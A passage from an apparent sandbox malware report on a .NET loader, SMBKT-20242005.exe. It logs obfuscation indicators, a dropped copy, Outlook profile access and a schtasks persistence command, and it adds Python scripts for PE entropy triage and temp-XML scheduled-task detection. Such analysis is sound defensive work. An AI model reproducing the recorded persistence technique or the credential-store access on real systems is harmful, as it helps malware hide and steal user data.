                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SMBKT-20242005.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SMBKT-20242005.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: SMBKT-20242005.exe, FrmArticulos.cs | .Net Code: InitializeComponent contains xor as well as GetObject
                    Source: SMBKT-20242005.exe, FrmArticulos.cs | .Net Code: InitializeComponent
                    Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, LoginForm.cs | .Net Code: _200E_202E_200D_206C_202E_206B_200C_200E_206F_206F_202A_206E_202D_206B_206F_202A_202A_206C_206C_200C_206B_206E_202A_206D_200D_202B_200F_206A_202E_200B_202A_202E_202B_202C_200C_202A_206C_202A_206B_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs | .Net Code: qD0cfWrQG7lR456JhKH System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs | .Net Code: qD0cfWrQG7lR456JhKH System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Code function: 1_2_0137F568 pushfd ; iretd 1_2_0137F569
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01490C6D push edi; retf 8_2_01490C7A
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_02A3F568 pushfd ; iretd 9_2_02A3F569
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB0007 pushfd ; retf 9_2_04CB001E
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB5E8F push edi; retf 9_2_04CB5E92
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB5E83 push ebp; retf 9_2_04CB5E86
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB5E87 push ebp; retf 9_2_04CB5E8A
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB5E7F push esp; retf 9_2_04CB5E82
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB5E73 push ebx; retf 9_2_04CB5E76
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe | Code function: 9_2_04CB9BE6 pushfd ; retf 9_2_04CB9BE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_03000C6D push edi; retf 15_2_03000C7A
                    Source: SMBKT-20242005.exe | Static PE information: section name: .text entropy: 7.957426352792891
                    Source: joUXSCpr.exe.1.dr | Static PE information: section name: .text entropy: 7.957426352792891
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, xvFhJGQTqsI1UuxytV.cs | High entropy of concatenated method names: 'VkNrlPDK5i', 'jLrrEgJGvc', 'corrUHH8J8', 'd2rrquwVO1', 'Pn7rnkJZHM', 'p8ur5Iftj7', 'ygQrmKHjkG', 'e4cMt59hBJ', 'urEMoqKJOL', 'si2My3BkFw'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RB2hbuowLAD77RFAjt.cs | High entropy of concatenated method names: 'mf8MqMUB1J', 'QkcMn90FVG', 'xOOMAuY7MR', 'Ir5M5xNZjb', 'FSLMmH35Us', 'H8sMKJX07Q', 's4XMX6RJ2A', 'jYlMe5jAGU', 'TOFMReMxh9', 'W3fMcvhUk6'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, NBpKsHTbyWOajjPZR8.cs | High entropy of concatenated method names: 'PiiK3mEMGX', 'Mi5KjrqiFA', 'sGbKSQyovl', 'EiDKg1m6Ml', 'KFJKLYvAxX', 'mPBKx2wT1r', 'QVBKZSR4jF', 'xouKCvuBrb', 'lZtKPcCc25', 'CC9K7a5mBJ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, ce1ejpw8LdIwajTb0f.cs | High entropy of concatenated method names: 'dcoNRlivRB', 'o7uNc9eLkG', 'ToString', 'C7FNqk4FLK', 'WjHNnuifyq', 'nf1NAY9Tla', 'wohN58uwda', 'MH3NmuBRaI', 'uGXNKWS4Tk', 'slENXtKK2o'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, IbTTDEyVr6AL8S6lDj.cs | High entropy of concatenated method names: 'x4fMVWiUNJ', 'RL7MBnFF8e', 'Yu1MIlBVEe', 'HW9MF7yp6q', 'iJJMJxXu0e', 's3EMOrPVpI', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, zMYnEu9ZCOSuCGEhBb.cs | High entropy of concatenated method names: 'K7aSrk4my', 'AWQgdtPfL', 'dtaxU9b89', 'OYsZjWVsR', 'W5SPdCaDV', 'H0B7JlmlQ', 'zrvY1MUoaG5sdPSG2h', 'utq5JB7wsti1tLt06D', 'LHMMsshof', 'q8LG1eoDS'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, NJs0YFlEKbWeXGiHvfs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BLtGJJ0OeX', 'hXxGkVCEU8', 'DmWGfp9eZ7', 'qnRGwR2OPd', 'EXLGHcxSl6', 'goPG8e8pPV', 'AxDGtnboLG'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, di2lf8dRSFuX6wdQ7h.cs | High entropy of concatenated method names: 'sIrsCy7tAE', 'uhgsPLtIuv', 'ClgsVCZ97H', 'fVnsBPGcll', 'X5vsFZ0rJo', 'mbTsO2stoS', 'jl0sW5ep78', 'hJus2odWt5', 'B5YsaHVQjN', 'WN1sYZBtZb'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, OxhSPylpYJmsvdgICHu.cs | High entropy of concatenated method names: 'JV1r3NiHgO', 'rLfrjIHUDH', 'jD6rSGTs0B', 'fOErg3cG1d', 'yMOrLEYMBY', 'LkKrxqviJD', 'LqdrZ0Vp4o', 'GynrCQ6c2s', 'DlrrPKegMM', 'CRQr7rIo5y'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, MOpw42XW44bQchxYdQ.cs | High entropy of concatenated method names: 'ohZE0kHFqm', 'eVvEqJOhNO', 'IcnEn1EjOe', 'pnAEAhnxpm', 'bRdE5daMAw', 'PXsEmPCQOZ', 'bLIEK20mV5', 'ON4EXTPAWQ', 'WXhEe4hYE7', 'K7VERjKIoE'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, BO0nenn1KpnpOn007K.cs | High entropy of concatenated method names: 'Dispose', 'zbBly9tI9M', 'Jq99BpeD4U', 'suoKKh3DfW', 'nkBlQ2hbuw', 'BADlz77RFA', 'ProcessDialogKey', 'ytI9pbTTDE', 'Gr69lAL8S6', 'bDj993vFhJ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, JAGbyhU8trpxhEj6kj.cs | High entropy of concatenated method names: 'XrklKVSMvv', 'MGPlXKFxIW', 'mr8lRERwiG', 'zsrlc12d1Z', 'Cwtlbn30MN', 'kW1l67tx8g', 'TwapTPZFOtcSeT5h7V', 'RT7EmheVIcGalSnnx8', 'pLnllU3NK6', 'dAQlEDS29x'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, McTFqUJVJBW9WkAeJ8.cs | High entropy of concatenated method names: 'nRZbai7utf', 'fZlbhKR8NK', 'LEfbJDYxHK', 'FnGbk62I3n', 'u5tbBVjkev', 'rjKbIghQ9c', 'jnXbFqnSxP', 'gZ3bOrGxPQ', 'M7eb4f5ALs', 'cxmbW1UrSC'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, RVSMvvC2GPKFxIWs0H.cs | High entropy of concatenated method names: 'OutnJusoe2', 'CkDnkApeRV', 'kROnfV6bC0', 'g7dnwNluSh', 'hQRnH8dqYq', 'n3en8Amxsu', 'qgNntathyO', 'Ftmno54rSC', 'pilnyA4ohL', 'NXmnQkZyOP'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, eMNXW1V7tx8gMVO5Nm.cs | High entropy of concatenated method names: 'KJOm0YSZ94', 'jpZmnovuyi', 'uEbm5jRCbk', 'isJmK3hS8J', 'iODmXgtOkR', 'Fwc5HO4La9', 'CZG58grc5n', 'eTg5tvE7nn', 'oav5ooVngJ', 'FZj5yKOB1D'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, j8T3WcPr8ERwiGSsr1.cs | High entropy of concatenated method names: 'R4qAg6unTC', 'OfMAxGJNuB', 'wITAC75S36', 'hVkAPjv7mI', 'TMTAbuYYPM', 'O5MA6bgph4', 'WGfANVmibh', 'RkfAMAZL0g', 'hSKArKKmKo', 'XlFAGW5vKV'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, GdfDcr8tpxZ8CIFGQi.cs | High entropy of concatenated method names: 'dAuNo8cajN', 'gX6NQmbrx9', 'Nr0Mpj0Rqb', 'x2JMl00UEB', 'yysNYF1L8h', 'BneNh2LD2w', 'MC0Nd2MeS7', 'iQkNJ9GHkw', 'aIjNkoLyl3', 'FIrNf0MYEQ'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, hZF5sRzoC3nsU4Lu7S.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uB7rsC5v4G', 't7crbuvK84', 'Ds5r69Mgp9', 'tBjrNFTDQe', 'XPRrMWWLQf', 'qW4rrUDjPV', 'XRrrGfR5lX'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, ngOt4sfBWRhu2ZJStX.cs | High entropy of concatenated method names: 'ToString', 'Dvu6YTklsH', 'rAe6BmrqGQ', 'N946IPCfrh', 'CZo6F2yWna', 'Jjs6OiooHn', 'Sl86450h33', 'QDa6W9TUKn', 'TLE62al4jN', 'ooN6TNZlu8'
                    Source: 1.2.SMBKT-20242005.exe.4019a50.6.raw.unpack, DZq3j4WtyiAntFwYx5.cs | High entropy of concatenated method names: 'mTZKqBG8W7', 'd4ZKAWlwe8', 'lMlKm7jhde', 'CxAmQyj78x', 'cp1mzZLAqh', 'gR5KpV1N30', 'DvpKlKuFvW', 'FXHK9NQiat', 'oWsKEKmCZI', 'v1lKUxQmjD'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, xvFhJGQTqsI1UuxytV.cs | High entropy of concatenated method names: 'VkNrlPDK5i', 'jLrrEgJGvc', 'corrUHH8J8', 'd2rrquwVO1', 'Pn7rnkJZHM', 'p8ur5Iftj7', 'ygQrmKHjkG', 'e4cMt59hBJ', 'urEMoqKJOL', 'si2My3BkFw'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RB2hbuowLAD77RFAjt.cs | High entropy of concatenated method names: 'mf8MqMUB1J', 'QkcMn90FVG', 'xOOMAuY7MR', 'Ir5M5xNZjb', 'FSLMmH35Us', 'H8sMKJX07Q', 's4XMX6RJ2A', 'jYlMe5jAGU', 'TOFMReMxh9', 'W3fMcvhUk6'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, NBpKsHTbyWOajjPZR8.cs | High entropy of concatenated method names: 'PiiK3mEMGX', 'Mi5KjrqiFA', 'sGbKSQyovl', 'EiDKg1m6Ml', 'KFJKLYvAxX', 'mPBKx2wT1r', 'QVBKZSR4jF', 'xouKCvuBrb', 'lZtKPcCc25', 'CC9K7a5mBJ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, ce1ejpw8LdIwajTb0f.cs | High entropy of concatenated method names: 'dcoNRlivRB', 'o7uNc9eLkG', 'ToString', 'C7FNqk4FLK', 'WjHNnuifyq', 'nf1NAY9Tla', 'wohN58uwda', 'MH3NmuBRaI', 'uGXNKWS4Tk', 'slENXtKK2o'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, IbTTDEyVr6AL8S6lDj.cs | High entropy of concatenated method names: 'x4fMVWiUNJ', 'RL7MBnFF8e', 'Yu1MIlBVEe', 'HW9MF7yp6q', 'iJJMJxXu0e', 's3EMOrPVpI', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, zMYnEu9ZCOSuCGEhBb.cs | High entropy of concatenated method names: 'K7aSrk4my', 'AWQgdtPfL', 'dtaxU9b89', 'OYsZjWVsR', 'W5SPdCaDV', 'H0B7JlmlQ', 'zrvY1MUoaG5sdPSG2h', 'utq5JB7wsti1tLt06D', 'LHMMsshof', 'q8LG1eoDS'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, NJs0YFlEKbWeXGiHvfs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BLtGJJ0OeX', 'hXxGkVCEU8', 'DmWGfp9eZ7', 'qnRGwR2OPd', 'EXLGHcxSl6', 'goPG8e8pPV', 'AxDGtnboLG'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, di2lf8dRSFuX6wdQ7h.cs | High entropy of concatenated method names: 'sIrsCy7tAE', 'uhgsPLtIuv', 'ClgsVCZ97H', 'fVnsBPGcll', 'X5vsFZ0rJo', 'mbTsO2stoS', 'jl0sW5ep78', 'hJus2odWt5', 'B5YsaHVQjN', 'WN1sYZBtZb'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, OxhSPylpYJmsvdgICHu.cs | High entropy of concatenated method names: 'JV1r3NiHgO', 'rLfrjIHUDH', 'jD6rSGTs0B', 'fOErg3cG1d', 'yMOrLEYMBY', 'LkKrxqviJD', 'LqdrZ0Vp4o', 'GynrCQ6c2s', 'DlrrPKegMM', 'CRQr7rIo5y'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, MOpw42XW44bQchxYdQ.cs | High entropy of concatenated method names: 'ohZE0kHFqm', 'eVvEqJOhNO', 'IcnEn1EjOe', 'pnAEAhnxpm', 'bRdE5daMAw', 'PXsEmPCQOZ', 'bLIEK20mV5', 'ON4EXTPAWQ', 'WXhEe4hYE7', 'K7VERjKIoE'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, BO0nenn1KpnpOn007K.cs | High entropy of concatenated method names: 'Dispose', 'zbBly9tI9M', 'Jq99BpeD4U', 'suoKKh3DfW', 'nkBlQ2hbuw', 'BADlz77RFA', 'ProcessDialogKey', 'ytI9pbTTDE', 'Gr69lAL8S6', 'bDj993vFhJ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, JAGbyhU8trpxhEj6kj.cs | High entropy of concatenated method names: 'XrklKVSMvv', 'MGPlXKFxIW', 'mr8lRERwiG', 'zsrlc12d1Z', 'Cwtlbn30MN', 'kW1l67tx8g', 'TwapTPZFOtcSeT5h7V', 'RT7EmheVIcGalSnnx8', 'pLnllU3NK6', 'dAQlEDS29x'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, McTFqUJVJBW9WkAeJ8.cs | High entropy of concatenated method names: 'nRZbai7utf', 'fZlbhKR8NK', 'LEfbJDYxHK', 'FnGbk62I3n', 'u5tbBVjkev', 'rjKbIghQ9c', 'jnXbFqnSxP', 'gZ3bOrGxPQ', 'M7eb4f5ALs', 'cxmbW1UrSC'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, RVSMvvC2GPKFxIWs0H.cs | High entropy of concatenated method names: 'OutnJusoe2', 'CkDnkApeRV', 'kROnfV6bC0', 'g7dnwNluSh', 'hQRnH8dqYq', 'n3en8Amxsu', 'qgNntathyO', 'Ftmno54rSC', 'pilnyA4ohL', 'NXmnQkZyOP'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, eMNXW1V7tx8gMVO5Nm.cs | High entropy of concatenated method names: 'KJOm0YSZ94', 'jpZmnovuyi', 'uEbm5jRCbk', 'isJmK3hS8J', 'iODmXgtOkR', 'Fwc5HO4La9', 'CZG58grc5n', 'eTg5tvE7nn', 'oav5ooVngJ', 'FZj5yKOB1D'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, j8T3WcPr8ERwiGSsr1.cs | High entropy of concatenated method names: 'R4qAg6unTC', 'OfMAxGJNuB', 'wITAC75S36', 'hVkAPjv7mI', 'TMTAbuYYPM', 'O5MA6bgph4', 'WGfANVmibh', 'RkfAMAZL0g', 'hSKArKKmKo', 'XlFAGW5vKV'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, GdfDcr8tpxZ8CIFGQi.cs | High entropy of concatenated method names: 'dAuNo8cajN', 'gX6NQmbrx9', 'Nr0Mpj0Rqb', 'x2JMl00UEB', 'yysNYF1L8h', 'BneNh2LD2w', 'MC0Nd2MeS7', 'iQkNJ9GHkw', 'aIjNkoLyl3', 'FIrNf0MYEQ'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, hZF5sRzoC3nsU4Lu7S.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uB7rsC5v4G', 't7crbuvK84', 'Ds5r69Mgp9', 'tBjrNFTDQe', 'XPRrMWWLQf', 'qW4rrUDjPV', 'XRrrGfR5lX'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, ngOt4sfBWRhu2ZJStX.cs | High entropy of concatenated method names: 'ToString', 'Dvu6YTklsH', 'rAe6BmrqGQ', 'N946IPCfrh', 'CZo6F2yWna', 'Jjs6OiooHn', 'Sl86450h33', 'QDa6W9TUKn', 'TLE62al4jN', 'ooN6TNZlu8'
                    Source: 1.2.SMBKT-20242005.exe.76c0000.11.raw.unpack, DZq3j4WtyiAntFwYx5.cs | High entropy of concatenated method names: 'mTZKqBG8W7', 'd4ZKAWlwe8', 'lMlKm7jhde', 'CxAmQyj78x', 'cp1mzZLAqh', 'gR5KpV1N30', 'DvpKlKuFvW', 'FXHK9NQiat', 'oWsKEKmCZI', 'v1lKUxQmjD'
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe | File created: C:\Users\user\AppData\Roaming\joUXSCpr.exe
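                    The .text entropy of 7.957 reported above for both the sample and the dropped joUXSCpr.exe sits close to the 8.0 maximum, which is the usual static indicator of a packed or encrypted payload that a .NET loader later rebuilds with System.Reflection.Assembly.Load(byte[]). The script below reproduces that per-section check outside the sandbox. It is an added example, not code from the Joe Sandbox report or from the sample; the PE image it analyses is constructed inside the script rather than being SMBKT-20242005.exe, and the 7.0 flagging threshold is a conventional triage value assumed here, not a number taken from the report.

```python
"""Per-section Shannon entropy of a PE image (added triage check, not report code)."""
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every section in an in-memory PE image.

    Minimal walk: DOS header -> e_lfanew -> "PE\\0\\0" -> COFF header ->
    skip the optional header -> section table. Enough for entropy triage,
    not a full PE validator.
    """
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]   # NumberOfSections
    size_opt = struct.unpack_from("<H", image, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + size_opt                                   # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        size_raw, ptr_raw = struct.unpack_from("<II", image, hdr + 16)  # SizeOfRawData, PointerToRawData
        yield name, image[ptr_raw:ptr_raw + size_raw]


def section_entropy_report(image: bytes, threshold: float = 7.0) -> dict:
    """Map section name -> (entropy rounded to 3 places, flagged).

    A section at or above `threshold` (assumed triage cut-off) is flagged as
    likely packed or encrypted.
    """
    report = {}
    for name, data in pe_sections(image):
        h = shannon_entropy(data)
        report[name] = (round(h, 3), h >= threshold)
    return report


def build_test_pe(sections) -> bytes:
    """Construct a minimal PE32 image from [(name, raw_bytes)].

    Constructed demo data, not the analysed sample; only the fields that
    pe_sections() reads carry meaningful values.
    """
    n = len(sections)
    size_opt = 0xE0                      # PE32 optional header size
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, size_opt, 0x0102)
    ptr = e_lfanew + 4 + 20 + size_opt + 40 * n   # first byte after the headers
    table, payload = b"", b""
    for name, data in sections:
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
        payload += data
        ptr += len(data)
    return dos + b"PE\0\0" + coff + b"\0" * size_opt + table + payload


if __name__ == "__main__":
    demo = build_test_pe([
        (".text", bytes(range(256)) * 256),   # every byte value equally often: 8.0 bits
        (".rsrc", b"\0" * 4096),              # constant filler: 0.0 bits
    ])
    for name, (h, flagged) in section_entropy_report(demo).items():
        print(f"{name:8s} entropy={h:.3f} {'PACKED?' if flagged else 'ok'}")
```

                    On a real file, pass `open(path, "rb").read()` to section_entropy_report(); a .text section scoring near 8.0 in a small .NET executable, as here, is worth unpacking before trusting any static string or import analysis.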

                    Boot Survival

                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"
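                    The persistence step above is what the Sigma hit "Scheduled temp file as task from temp location" keys on: schtasks.exe /Create importing a task definition with /XML from a path under a temp directory, something a real installer rarely does. The script below is an added detection example, not code from the Joe Sandbox report or from Sigma; it runs the same logic over process-creation command lines. Only the first sample command line is the one recorded in this report; the others are constructed to show a benign import, flag-order and case variants, and a non-creation call. The set of temp-path patterns is an assumption for the demo.

```python
"""Flag schtasks.exe /Create calls that import a task XML from a temp directory.

Added detection example (not the report's or Sigma's code). Command lines other
than the first are constructed for the demo.
"""
import re

_ARG = re.compile(r'"([^"]*)"|(\S+)')

# Staging locations a legitimate installer rarely imports a task from (assumed list).
_TEMP_LOCATIONS = (
    re.compile(r"\\AppData\\Local\\Temp\\", re.I),
    re.compile(r"^[A-Z]:\\Windows\\Temp\\", re.I),
    re.compile(r"%(TEMP|TMP)%", re.I),
)

SAMPLE_CMDLINES = [
    # recorded in this report
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"',
    # constructed: same flags, but the XML comes from ProgramData (typical installer)
    r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\ProgramData\Vendor\updater.xml"',
    # constructed: lower-case flags, different order, Windows\Temp
    r'C:\Windows\System32\schtasks.exe /create /xml C:\Windows\Temp\svc.xml /tn "Svc\Helper"',
    # constructed: environment-variable temp path, no /TN given
    r'schtasks /Create /XML %TEMP%\task.xml /F',
    # constructed: not a creation at all
    r'schtasks /Query /TN "Updates\joUXSCpr"',
]


def tokenize(cmdline: str) -> list:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _ARG.finditer(cmdline)]


def is_temp_path(path: str) -> bool:
    return any(p.search(path) for p in _TEMP_LOCATIONS)


def flag_schtasks(cmdline: str):
    """Return (task_name, xml_path) if cmdline creates a task from a temp XML, else None.

    Flags are matched case-insensitively (schtasks accepts /XML and /xml alike)
    and the image path may be quoted, absolute or bare.
    """
    argv = tokenize(cmdline)
    if not argv or argv[0].rsplit("\\", 1)[-1].lower() not in ("schtasks.exe", "schtasks"):
        return None
    opts = {}
    for i, arg in enumerate(argv[1:], start=1):
        if arg.startswith("/"):
            nxt = argv[i + 1] if i + 1 < len(argv) else ""
            opts[arg.lower()] = "" if nxt.startswith("/") else nxt   # flag without a value
    if "/create" not in opts or "/xml" not in opts:
        return None
    xml_path = opts["/xml"]
    if not is_temp_path(xml_path):
        return None
    return opts.get("/tn", ""), xml_path


def scan(cmdlines) -> list:
    """Run flag_schtasks over process-creation command lines; return (cmdline, hit) pairs."""
    hits = []
    for cmd in cmdlines:
        hit = flag_schtasks(cmd)
        if hit is not None:
            hits.append((cmd, hit))
    return hits


if __name__ == "__main__":
    for cmd, (task, xml) in scan(SAMPLE_CMDLINES):
        print(f"ALERT task={task or '<none>'} xml={xml}\n    {cmd}")
```

                    Feeding this Sysmon Event ID 1 or Security 4688 command lines catches the task registration itself; the follow-up check is to read the XML (here tmp6AB.tmp, deleted by the time a responder looks) from the registered task under \Updates\ to recover the action it launches.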

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe | Process information set: NOOPENFILEERRORBOX (46 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (51 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
